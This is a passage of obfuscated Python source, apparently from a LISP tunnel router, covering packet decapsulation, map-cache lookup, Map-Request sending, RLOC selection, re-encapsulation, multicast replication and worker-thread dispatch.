I1IIIiI1I1ii1 += chr ( ( I111i1i1111 >> 8 ) & 0xff )
I1IIIiI1I1ii1 += chr ( I111i1i1111 & 0xff )
I1IIIiI1I1ii1 += '\x00'
if 38 - 38: IiII - I1ii11iIi11i . OoOoOO00 - I1Ii111 . OoooooooOO
if 89 - 89: iIii1I11I1II1
if 21 - 21: I11i % I11i
if 27 - 27: i11iIiiIii / I1ii11iIi11i
packet = o00 + I1IIIiI1I1ii1 + packet
o00Oo0oooooo ( "Encap" , packet )
else :
oO = len ( packet )
Oooo00 = O00o0OO0000oo . stats
o00Oo0oooooo ( "Send" , packet )
if 84 - 84: Oo0Ooo
if 43 - 43: oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
O00o0OO0000oo . last_refresh_time = time . time ( )
Oooo00 . increment ( oO )
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
if 42 - 42: OoOoOO00 * OoOoOO00 * I1Ii111 . I11i
if 51 - 51: OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o * iIii1I11I1II1 % OoO0O00
if 99 - 99: oO0o * II111iiii * I1Ii111
ii1 = ii1 . print_address_no_iid ( )
OOo . sendto ( packet , ( ii1 , 0 ) )
if 92 - 92: Oo0Ooo
o0O ( Ooo00O0o , "Fast" )
return ( True )
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
if 87 - 87: ooOoO0o
def IIIii ( lisp_packet , thread_name ) :
global II1iII1i , O00OooOo00o , IiI11i1IIiiI
global OOo , Ii1IIii11
global oO0oIIII
global iIiiI1
global oo0Ooo0
if 60 - 60: I1ii11iIi11i * I1IiiI
Ooo00O0o = o0O ( None , "RTR" )
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
if ( oo0Ooo0 ) :
if ( I1Iii1 ( lisp_packet . packet ) ) : return
if 38 - 38: OoOoOO00 / iII111i % Oo0Ooo
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
if 61 - 61: I11i % ooOoO0o - OoO0O00 / Oo0Ooo
if 4 - 4: OoooooooOO - i1IIi % Ii1I - OOooOOo * o0oOOo0O0Ooo
Ooooo00o0OoO = lisp_packet
oooo0O0O0o0 = Ooooo00o0OoO . is_lisp_packet ( Ooooo00o0OoO . packet )
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
if ( oooo0O0O0o0 == False ) :
oOoOOo0oo0 = Ooooo00o0OoO . packet
o0O0Oo00Oo0o , OOOo , OoOO , oo0OOo0O = lisp . lisp_is_rloc_probe ( oOoOOo0oo0 , - 1 )
if ( oOoOOo0oo0 != o0O0Oo00Oo0o ) :
if ( OOOo == None ) : return
lisp . lisp_parse_packet ( II1iII1i , o0O0Oo00Oo0o , OOOo , OoOO , oo0OOo0O )
return
if 39 - 39: OoooooooOO + oO0o % OOooOOo / OOooOOo
if 27 - 27: iII111i . I11i . iIii1I11I1II1 . iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
Ooooo00o0OoO . packet = lisp . lisp_reassemble ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
if ( lisp . lisp_flow_logging ) : Ooooo00o0OoO = copy . deepcopy ( Ooooo00o0OoO )
if 68 - 68: Oo0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 * iIii1I11I1II1 * i11iIiiIii + I1IiiI / OOooOOo % Ii1I
if 58 - 58: OOooOOo * o0oOOo0O0Ooo + O0 % OOooOOo
if 25 - 25: Oo0Ooo % I1ii11iIi11i * ooOoO0o
if 6 - 6: iII111i . IiII * OoOoOO00 . i1IIi
if 98 - 98: i1IIi
if 65 - 65: OoOoOO00 / OoO0O00 % IiII
if ( oooo0O0O0o0 ) :
if ( Ooooo00o0OoO . decode ( True , None , lisp . lisp_decap_stats ) == None ) : return
Ooooo00o0OoO . print_packet ( "Receive-({})" . format ( thread_name ) , True )
Ooooo00o0OoO . strip_outer_headers ( )
else :
if ( Ooooo00o0OoO . decode ( False , None , None ) == None ) : return
Ooooo00o0OoO . print_packet ( "Receive-({})" . format ( thread_name ) , False )
if 45 - 45: OoOoOO00
if 66 - 66: OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
if 23 - 23: oO0o - OOooOOo + I11i
if 12 - 12: I1IiiI / ooOoO0o % o0oOOo0O0Ooo / i11iIiiIii % OoooooooOO
if 15 - 15: iIii1I11I1II1 % OoooooooOO - Oo0Ooo * Ii1I + I11i
if 11 - 11: iII111i * Ii1I - OoOoOO00
if 66 - 66: OoOoOO00 . i11iIiiIii - iII111i * o0oOOo0O0Ooo + OoooooooOO * I1ii11iIi11i
if 74 - 74: Oo0Ooo
if 61 - 61: Oo0Ooo - I1Ii111 * II111iiii % ooOoO0o * iIii1I11I1II1 + OoO0O00
if 71 - 71: I11i / I11i * oO0o * oO0o / II111iiii
if ( oooo0O0O0o0 and Ooooo00o0OoO . lisp_header . get_instance_id ( ) == 0xffffff ) :
II1I1iiIII1I1 = lisp . lisp_control_header ( )
II1I1iiIII1I1 . decode ( Ooooo00o0OoO . packet )
if ( II1I1iiIII1I1 . is_info_request ( ) ) :
o0Ooo0o0ooo0 = lisp . lisp_info ( )
o0Ooo0o0ooo0 . decode ( Ooooo00o0OoO . packet )
o0Ooo0o0ooo0 . print_info ( )
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
ooo = o0Ooo0o0ooo0 . hostname if ( o0Ooo0o0ooo0 . hostname != None ) else ""
OOOO0oooo = Ooooo00o0OoO . outer_source
o0o = Ooooo00o0OoO . udp_sport
if ( lisp . lisp_store_nat_info ( ooo , OOOO0oooo , o0o ) ) :
o00oo0 ( II1iII1i , ooo , OOOO0oooo , o0o )
if 51 - 51: O0 - i1IIi / I1IiiI
else :
OOOo = Ooooo00o0OoO . outer_source . print_address_no_iid ( )
oo0OOo0O = Ooooo00o0OoO . outer_ttl
Ooooo00o0OoO = Ooooo00o0OoO . packet
if ( lisp . lisp_is_rloc_probe_request ( Ooooo00o0OoO [ 28 ] ) == False and
lisp . lisp_is_rloc_probe_reply ( Ooooo00o0OoO [ 28 ] ) == False ) : oo0OOo0O = - 1
Ooooo00o0OoO = Ooooo00o0OoO [ 28 : : ]
lisp . lisp_parse_packet ( II1iII1i , Ooooo00o0OoO , OOOo , 0 , oo0OOo0O )
if 37 - 37: o0oOOo0O0Ooo % ooOoO0o
return
if 83 - 83: OOooOOo . I1Ii111 + oO0o - OOooOOo * I1Ii111 / I1Ii111
if 39 - 39: I1Ii111 / Oo0Ooo % OoO0O00 % i11iIiiIii
if 90 - 90: I1Ii111 - OoooooooOO
if 96 - 96: O0 . Ii1I % OoO0O00 * iIii1I11I1II1
if 54 - 54: Ii1I * I1Ii111 - OoooooooOO % I1IiiI + O0
if 6 - 6: I1ii11iIi11i - II111iiii / oO0o + i11iIiiIii + OOooOOo
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 54 - 54: Ii1I - I11i - I1Ii111 . iIii1I11I1II1
if 79 - 79: Ii1I . OoO0O00
if 40 - 40: o0oOOo0O0Ooo + Oo0Ooo . o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: Ii1I * Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 - i11iIiiIii
if 60 - 60: I1IiiI * I1Ii111 % OoO0O00 + oO0o
if ( oooo0O0O0o0 ) :
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( Ooooo00o0OoO . packet ) )
if 52 - 52: i1IIi
if 84 - 84: Ii1I / IiII
if 86 - 86: OoOoOO00 * II111iiii - O0 . OoOoOO00 % iIii1I11I1II1 / OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
I1i11II = None
if ( Ooooo00o0OoO . inner_dest . is_mac ( ) ) :
Ooooo00o0OoO . packet = lisp . lisp_mac_input ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . encap_port = lisp . LISP_VXLAN_DATA_PORT
elif ( Ooooo00o0OoO . inner_version == 4 ) :
I1i11II , Ooooo00o0OoO . packet = lisp . lisp_ipv4_input ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . inner_ttl = Ooooo00o0OoO . outer_ttl
elif ( Ooooo00o0OoO . inner_version == 6 ) :
Ooooo00o0OoO . packet = lisp . lisp_ipv6_input ( Ooooo00o0OoO )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . inner_ttl = Ooooo00o0OoO . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if 31 - 31: oO0o / IiII * o0oOOo0O0Ooo . II111iiii
if 89 - 89: O0
if 2 - 2: I1ii11iIi11i . I1ii11iIi11i + I1ii11iIi11i * o0oOOo0O0Ooo
if 100 - 100: Oo0Ooo % Ii1I / I11i
if 30 - 30: Oo0Ooo - OOooOOo - iII111i
if ( Ooooo00o0OoO . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( Ooooo00o0OoO , ed = "decap" ) == False ) : return
Ooooo00o0OoO . outer_source . afi = lisp . LISP_AFI_NONE
Ooooo00o0OoO . outer_dest . afi = lisp . LISP_AFI_NONE
if 81 - 81: o0oOOo0O0Ooo . OoooooooOO + OOooOOo * ooOoO0o
if 74 - 74: i1IIi + O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
i1iIi1iI , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( Ooooo00o0OoO . inner_source , None ,
Ooooo00o0OoO . outer_source )
if ( i1iIi1iI ) :
Ooo = Ooooo00o0OoO . packet if ( I1i11II ) else None
lisp . lisp_glean_map_cache ( Ooooo00o0OoO . inner_source , Ooooo00o0OoO . outer_source ,
Ooooo00o0OoO . udp_sport , Ooo )
if ( I1i11II ) : return
if 65 - 65: Oo0Ooo / I11i
if 12 - 12: I11i % OoOoOO00
if 48 - 48: iII111i . i11iIiiIii
if 5 - 5: oO0o . I1ii11iIi11i . II111iiii . OoooooooOO
if 96 - 96: i11iIiiIii - OOooOOo % O0 / OoO0O00
if 100 - 100: iII111i / Ii1I - OoooooooOO % II111iiii - I1IiiI % OoOoOO00
oOO00O = Ooooo00o0OoO . inner_dest
if ( oOO00O . is_multicast_address ( ) ) :
ooo0OO = False
i1I11IiI1iiII , o00oOo0oOoo , iIi1IiI = lisp . lisp_allow_gleaning ( Ooooo00o0OoO . inner_source , oOO00O , None )
else :
ooo0OO , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( oOO00O , None , None )
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
Ooooo00o0OoO . gleaned_dest = ooo0OO
if 53 - 53: Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if 12 - 12: OOooOOo
O00o0OO0000oo = lisp . lisp_map_cache_lookup ( Ooooo00o0OoO . inner_source , Ooooo00o0OoO . inner_dest )
if ( O00o0OO0000oo ) : O00o0OO0000oo . add_recent_source ( Ooooo00o0OoO . inner_source )
if 69 - 69: OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if ( O00o0OO0000oo and ( O00o0OO0000oo . action == lisp . LISP_NATIVE_FORWARD_ACTION or
O00o0OO0000oo . eid . address == 0 ) ) :
oo = lisp . lisp_db_for_lookups . lookup_cache ( Ooooo00o0OoO . inner_source , False )
if ( oo and oo . secondary_iid ) :
i1II1I = Ooooo00o0OoO . inner_dest
i1II1I . instance_id = oo . secondary_iid
if 95 - 95: OoO0O00 - OOooOOo / II111iiii % I1ii11iIi11i . o0oOOo0O0Ooo
O00o0OO0000oo = lisp . lisp_map_cache_lookup ( Ooooo00o0OoO . inner_source , i1II1I )
if ( O00o0OO0000oo ) :
Ooooo00o0OoO . gleaned_dest = O00o0OO0000oo . gleaned
O00o0OO0000oo . add_recent_source ( Ooooo00o0OoO . inner_source )
else :
ooo0OO , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( i1II1I , None ,
None )
Ooooo00o0OoO . gleaned_dest = ooo0OO
if 24 - 24: i1IIi . i11iIiiIii
if 16 - 16: Oo0Ooo % I1ii11iIi11i + I11i - O0 . iII111i / I1Ii111
if 35 - 35: oO0o / I1Ii111 / II111iiii - iIii1I11I1II1 + II111iiii . I1Ii111
if 81 - 81: iII111i * OOooOOo - I1ii11iIi11i * Ii1I % OoOoOO00 * OoOoOO00
if 59 - 59: iIii1I11I1II1
if 7 - 7: OOooOOo * I1IiiI / o0oOOo0O0Ooo * i11iIiiIii
if 84 - 84: OOooOOo . iII111i
if 8 - 8: Oo0Ooo + II111iiii * OOooOOo * OoOoOO00 * I11i / IiII
if 21 - 21: oO0o / OoooooooOO
if ( O00o0OO0000oo == None and ooo0OO ) :
lisp . lprint ( "Suppress Map-Request for gleaned EID {}" . format ( lisp . green ( Ooooo00o0OoO . inner_dest . print_address ( ) , False ) ) )
if 11 - 11: OOooOOo % Ii1I - i11iIiiIii - oO0o + ooOoO0o + IiII
return
if 87 - 87: I1Ii111 * i1IIi / I1ii11iIi11i
if 6 - 6: o0oOOo0O0Ooo + Oo0Ooo - OoooooooOO % OOooOOo * OoOoOO00
if ( O00o0OO0000oo == None or O00o0OO0000oo . action == lisp . LISP_SEND_MAP_REQUEST_ACTION ) :
if ( lisp . lisp_rate_limit_map_request ( Ooooo00o0OoO . inner_source ,
Ooooo00o0OoO . inner_dest ) ) : return
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
Ooooo00o0OoO . inner_source , Ooooo00o0OoO . inner_dest , None )
if 69 - 69: i1IIi
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
ooOoOOOOo = "map-cache miss"
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = ooOoOOOOo , lisp_socket = OOOO0oooo )
if 71 - 71: II111iiii * iIii1I11I1II1 / I1ii11iIi11i
return
if 23 - 23: II111iiii
if 24 - 24: iIii1I11I1II1 + iIii1I11I1II1 * iII111i
if 18 - 18: iII111i * I11i - Ii1I
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if ( O00o0OO0000oo and O00o0OO0000oo . is_active ( ) and O00o0OO0000oo . has_ttl_elapsed ( ) and
O00o0OO0000oo . gleaned == False ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( O00o0OO0000oo . print_eid_tuple ( ) , False ) ) )
if 39 - 39: iIii1I11I1II1 - OoooooooOO
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
Ooooo00o0OoO . inner_source , Ooooo00o0OoO . inner_dest , None )
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
if 19 - 19: I11i
if 67 - 67: O0 % iIii1I11I1II1 / IiII . i11iIiiIii - Ii1I + O0
if 27 - 27: OOooOOo
O00o0OO0000oo . last_refresh_time = time . time ( )
O00o0OO0000oo . stats . increment ( len ( Ooooo00o0OoO . packet ) )
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
IIiIiiiIIIIi1 , iIi11 , O00O0 , iIiIiiiIi , i1iiIIi11I , o00oO0oOo00 = O00o0OO0000oo . select_rloc ( Ooooo00o0OoO , None )
if 80 - 80: ooOoO0o * O0
if 78 - 78: OoOoOO00
if ( IIiIiiiIIIIi1 == None and i1iiIIi11I == None ) :
if ( iIiIiiiIi == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
Ooooo00o0OoO . send_packet ( OOo , Ooooo00o0OoO . inner_dest )
if 20 - 20: iII111i % Ii1I . Ii1I / I11i + OoOoOO00 . Ii1I
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
ooOoOOOOo = "not an EID"
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = ooOoOOOOo , lisp_socket = OOOO0oooo )
if 53 - 53: OOooOOo + I1IiiI / i11iIiiIii - o0oOOo0O0Ooo * oO0o / OoooooooOO
o0O ( Ooo00O0o , "RTR" )
return
if 89 - 89: iIii1I11I1II1 / I1IiiI - II111iiii / Ii1I . i11iIiiIii . Ii1I
ooOoOOOOo = "No reachable RLOCs found"
lisp . dprint ( ooOoOOOOo )
if 48 - 48: O0 + O0 . I1Ii111 - ooOoO0o
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = ooOoOOOOo , lisp_socket = OOOO0oooo )
if 63 - 63: oO0o
return
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if ( IIiIiiiIIIIi1 and IIiIiiiIIIIi1 . is_null ( ) ) :
lisp . dprint ( "Drop action RLOC found" )
if 36 - 36: IiII
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
ooOoOOOOo = "drop action"
lisp . lisp_trace_append ( Ooooo00o0OoO , reason = ooOoOOOOo , lisp_socket = OOOO0oooo )
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
return
if 74 - 74: I1Ii111 % I1ii11iIi11i
if 7 - 7: II111iiii
if 27 - 27: oO0o . OoooooooOO + i11iIiiIii
if 86 - 86: I11i / o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + oO0o
if 33 - 33: o0oOOo0O0Ooo . iII111i . IiII . i1IIi
Ooooo00o0OoO . outer_tos = Ooooo00o0OoO . inner_tos
Ooooo00o0OoO . outer_ttl = Ooooo00o0OoO . inner_ttl
if 49 - 49: I1ii11iIi11i
if 84 - 84: I11i - Oo0Ooo / O0 - I1Ii111
if 21 - 21: O0 * O0 % I1ii11iIi11i
if 94 - 94: I11i + II111iiii % i11iIiiIii
if ( IIiIiiiIIIIi1 ) :
Ooooo00o0OoO . encap_port = iIi11
if ( iIi11 == 0 ) : Ooooo00o0OoO . encap_port = lisp . LISP_DATA_PORT
Ooooo00o0OoO . outer_dest . copy_address ( IIiIiiiIIIIi1 )
i1i1IiIiIi1Ii = Ooooo00o0OoO . outer_dest . afi_to_version ( )
Ooooo00o0OoO . outer_version = i1i1IiIiIi1Ii
if 64 - 64: OOooOOo + OoooooooOO * OoooooooOO
i1IiiI1I1IIi11i1 = iIiiI1 if ( i1i1IiIiIi1Ii == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 45 - 45: ooOoO0o % o0oOOo0O0Ooo - ooOoO0o
Ooooo00o0OoO . outer_source . copy_address ( i1IiiI1I1IIi11i1 )
if 31 - 31: IiII / i11iIiiIii
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
if ( lisp . lisp_trace_append ( Ooooo00o0OoO , rloc_entry = o00oO0oOo00 ,
lisp_socket = OOOO0oooo ) == False ) : return
if 83 - 83: I1ii11iIi11i / I1Ii111 - i11iIiiIii . iIii1I11I1II1 + Oo0Ooo
if 59 - 59: O0 % Oo0Ooo
if 92 - 92: Ii1I % iII111i / I1ii11iIi11i % I1ii11iIi11i * I1IiiI
if 74 - 74: O0 . I1IiiI % OoO0O00 % IiII
if 87 - 87: oO0o - i11iIiiIii
if ( Ooooo00o0OoO . encode ( O00O0 ) == None ) : return
if ( len ( Ooooo00o0OoO . packet ) <= 1500 ) : Ooooo00o0OoO . print_packet ( "Send" , True )
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
iI1 = Ii1IIii11 if i1i1IiIiIi1Ii == 6 else OOo
Ooooo00o0OoO . send_packet ( iI1 , Ooooo00o0OoO . outer_dest )
if 14 - 14: I1ii11iIi11i
elif ( i1iiIIi11I ) :
if 49 - 49: oO0o / i1IIi % Ii1I . I1IiiI
if 93 - 93: OOooOOo
if 43 - 43: I1ii11iIi11i / I1IiiI . ooOoO0o
if 62 - 62: iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % O0 . I1Ii111
Oo0oOooOoOo = len ( Ooooo00o0OoO . packet )
for I1i in i1iiIIi11I . rle_forwarding_list :
Ooooo00o0OoO . outer_dest . copy_address ( I1i . address )
Ooooo00o0OoO . encap_port = lisp . LISP_DATA_PORT if I1i . translated_port == 0 else I1i . translated_port
if 59 - 59: OoooooooOO . Ii1I / O0 - OOooOOo
if 1 - 1: IiII / IiII - i11iIiiIii
i1i1IiIiIi1Ii = Ooooo00o0OoO . outer_dest . afi_to_version ( )
Ooooo00o0OoO . outer_version = i1i1IiIiIi1Ii
if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
i1IiiI1I1IIi11i1 = iIiiI1 if ( i1i1IiIiIi1Ii == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
Ooooo00o0OoO . outer_source . copy_address ( i1IiiI1I1IIi11i1 )
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
if ( Ooooo00o0OoO . is_trace ( ) ) :
OOOO0oooo = oO0oIIII
ooOoOOOOo = "replicate"
if ( lisp . lisp_trace_append ( Ooooo00o0OoO , reason = ooOoOOOOo , lisp_socket = OOOO0oooo ) == False ) : return
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
if ( Ooooo00o0OoO . encode ( None ) == None ) : return
if 14 - 14: iIii1I11I1II1 * I1Ii111 * I1ii11iIi11i / iIii1I11I1II1 * IiII / I11i
Ooooo00o0OoO . print_packet ( "Replicate-to-L{}" . format ( I1i . level ) , True )
Ooooo00o0OoO . send_packet ( OOo , Ooooo00o0OoO . outer_dest )
if 77 - 77: OoO0O00 + I1Ii111 + I1Ii111 * Ii1I / OoooooooOO . Ii1I
if 62 - 62: i1IIi - i1IIi
if 69 - 69: OoOoOO00 % oO0o - I11i
if 38 - 38: iIii1I11I1II1 + i11iIiiIii / i11iIiiIii % OoO0O00 / ooOoO0o % Ii1I
if 7 - 7: IiII * I1IiiI + i1IIi + i11iIiiIii + Oo0Ooo % I1IiiI
OO00OO0o0 = len ( Ooooo00o0OoO . packet ) - Oo0oOooOoOo
Ooooo00o0OoO . packet = Ooooo00o0OoO . packet [ OO00OO0o0 : : ]
if 52 - 52: I1ii11iIi11i % oO0o - i11iIiiIii
if ( lisp . lisp_flow_logging ) : Ooooo00o0OoO = copy . deepcopy ( Ooooo00o0OoO )
if 30 - 30: iII111i / OoO0O00 + oO0o
if 6 - 6: iII111i . I11i + Ii1I . I1Ii111
if 70 - 70: OoO0O00
if 46 - 46: I11i - i1IIi
if 46 - 46: I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
del ( Ooooo00o0OoO )
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
o0O ( Ooo00O0o , "RTR" )
return
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
def I1I1iII1i ( lisp_thread ) :
lisp . lisp_set_exception ( )
while ( True ) :
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
Ooooo00o0OoO = lisp_thread . input_queue . get ( )
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
lisp_thread . input_stats . increment ( len ( Ooooo00o0OoO ) )
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
lisp_thread . lisp_packet . packet = Ooooo00o0OoO
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if 47 - 47: o0oOOo0O0Ooo
IIIii ( lisp_thread . lisp_packet , lisp_thread . thread_name )
if 66 - 66: I1IiiI - IiII
return
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
def o00Ooo0 ( thread ) :
O0O00O = ( time . time ( ) % thread . number_of_pcap_threads )
return ( int ( O0O00O ) == thread . thread_number )
if 4 - 4: OoOoOO00 + Ii1I / oO0o
if 13 - 13: iII111i
if 80 - 80: Ii1I - o0oOOo0O0Ooo
if 41 - 41: o0oOOo0O0Ooo - Oo0Ooo * I1IiiI
if 82 - 82: OoO0O00 % o0oOOo0O0Ooo % OOooOOo / O0
if 94 - 94: I1ii11iIi11i + I1ii11iIi11i + OoooooooOO % ooOoO0o
if 7 - 7: iII111i
if 78 - 78: OOooOOo + iII111i . IiII
def Oo ( parms , not_used , packet ) :
if ( o00Ooo0 ( parms [ 1 ] ) == False ) : return
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
I1Iii1I = parms [ 0 ]
iIi11I = parms [ 1 ]
O0Oo = iIi11I . number_of_worker_threads
if 39 - 39: OOooOOo - OoooooooOO + Oo0Ooo
iIi11I . input_stats . increment ( len ( packet ) )
if 93 - 93: ooOoO0o . iIii1I11I1II1 % i11iIiiIii . OoOoOO00 % ooOoO0o + O0
if 65 - 65: Ii1I + OoO0O00 - OoooooooOO
if 51 - 51: Oo0Ooo + oO0o / iII111i - i1IIi
if 51 - 51: Oo0Ooo - I1ii11iIi11i * I11i
if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
if 78 - 78: IiII . OoOoOO00 . I11i
